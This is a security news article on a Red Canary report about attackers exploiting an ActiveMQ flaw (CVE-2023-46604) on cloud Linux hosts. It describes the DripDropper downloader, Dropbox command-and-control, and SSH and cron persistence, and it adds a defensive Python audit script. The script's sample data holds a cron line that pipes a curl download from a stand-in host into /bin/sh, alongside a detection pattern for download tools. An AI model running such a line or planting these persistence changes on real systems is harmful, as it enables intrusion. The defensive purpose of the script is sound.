Red Canary has revealed a sophisticated attack campaign targeting cloud-based Linux systems through a critical remote code execution flaw in Apache ActiveMQ (CVE-2023-46604). The campaign showcases how adversaries combine known vulnerabilities, stealthy malware, and even self-patching techniques to maintain persistence and avoid detection.
CVE-2023-46604, a widely exploited flaw in ActiveMQ, has been linked to ransomware families such as TellYouThePass, Ransomhub, and HelloKitty, as well as the Linux-focused cryptominer Kinsing.
In this campaign, attackers used the vulnerability to gain initial access before deploying post-exploitation frameworks like Sliver and covert communication channels via Cloudflare Tunnels. In one case, after establishing access, the adversary modified SSH configurations:
“After exploiting the endpoint and installing the Sliver implant… they modified the existing sshd configuration file to enable root login.”
This step granted remote access with the highest privileges, setting the stage for deeper persistence.
One of the most significant findings was the identification of a new downloader, dubbed DripDropper.
“DripDropper is an encrypted PyInstaller ELF file… It communicates with an adversary-controlled Dropbox account using a hardcoded bearer token.”
DripDropper typically created two malicious files:
- The first, dependent on execution arguments, could perform actions from process monitoring to reaching out to Dropbox for further instructions.
- The second, with a randomly generated eight-character name, frequently altered SSH configuration files, including changing the default shell of the games account to /bin/sh, effectively enabling hidden persistence.
Persistence was reinforced by editing system cron jobs (/etc/cron.*/0anacron).
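As an added example (not code from the Red Canary report), the following Python audit checks a host for the three persistence changes described above: the effective sshd PermitRootLogin directive, system accounts such as games given an interactive shell, and 0anacron cron scripts that fetch or execute code. The sshd_config, passwd and cron contents below are constructed samples standing in for files read from a host.

```python
import re

# Constructed sample inputs (not taken from the report) standing in for host files.
SSHD_CONFIG = """# sshd_config
Port 22
PermitRootLogin yes
Match User deploy
    PermitRootLogin no
"""
PASSWD = """root:x:0:0:root:/root:/bin/bash
games:x:5:60:games:/usr/games:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
"""
CRON_SCRIPTS = {
    "/etc/cron.daily/0anacron": "#!/bin/sh\ntest -x /usr/sbin/anacron || exit 0\n/usr/sbin/anacron -s\n",
    "/etc/cron.hourly/0anacron": "#!/bin/sh\n/usr/bin/curl -s https://example.invalid/x | /bin/sh\n",
}

NOLOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
# Heuristic: tooling a stock anacron wrapper never invokes.
NET_TOOLS = re.compile(r"\b(curl|wget|python3?|base64)\b")

def effective_permit_root_login(config: str) -> str:
    """Return the global PermitRootLogin value. sshd honours the first occurrence,
    and directives inside Match blocks only apply to matched sessions, so parsing
    stops at the first Match. Unset means the OpenSSH default, prohibit-password."""
    for raw in config.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, *rest = re.split(r"[\s=]+", line, maxsplit=1)
        if key.lower() == "match":
            break
        if key.lower() == "permitrootlogin" and rest:
            return rest[0].lower()
    return "prohibit-password"

def system_accounts_with_shell(passwd: str, uid_max: int = 999) -> list:
    """System accounts (0 < uid <= uid_max) whose login shell is interactive,
    e.g. the games account switched from nologin to /bin/sh."""
    hits = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if 0 < uid <= uid_max and shell not in NOLOGIN:
            hits.append((name, shell))
    return hits

def cron_scripts_fetching_code(scripts: dict) -> list:
    """Paths of cron scripts (e.g. /etc/cron.*/0anacron) that call download or
    interpreter tooling; these warrant comparison against the packaged original."""
    return sorted(path for path, body in scripts.items() if NET_TOOLS.search(body))

if __name__ == "__main__":
    print("PermitRootLogin:", effective_permit_root_login(SSHD_CONFIG))
    print("system accounts with shell:", system_accounts_with_shell(PASSWD))
    print("cron scripts to review:", cron_scripts_fetching_code(CRON_SCRIPTS))
```

On a live host, read /etc/ssh/sshd_config, /etc/passwd and the files under /etc/cron.* into these functions; `sshd -T` gives the fully resolved configuration if includes are in use.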
Attackers downloaded legitimate Apache Maven JAR files containing the patch for CVE-2023-46604, then replaced the vulnerable files on the compromised servers with them.
“By deleting the existing JAR files and replacing them, the adversary effectively patched the already compromised system.”
Red Canary assessed this tactic as a way to evade scanners and other adversaries, since patching does not disrupt already established persistence.
The report highlights how adversaries increasingly rely on public platforms for command-and-control (C2).
“The usage of public platforms like Discord, Telegram, and Dropbox for C2 communications has proven to be an effective technique for blending in.”
This trend complicates detection, as traffic blends with normal cloud application use.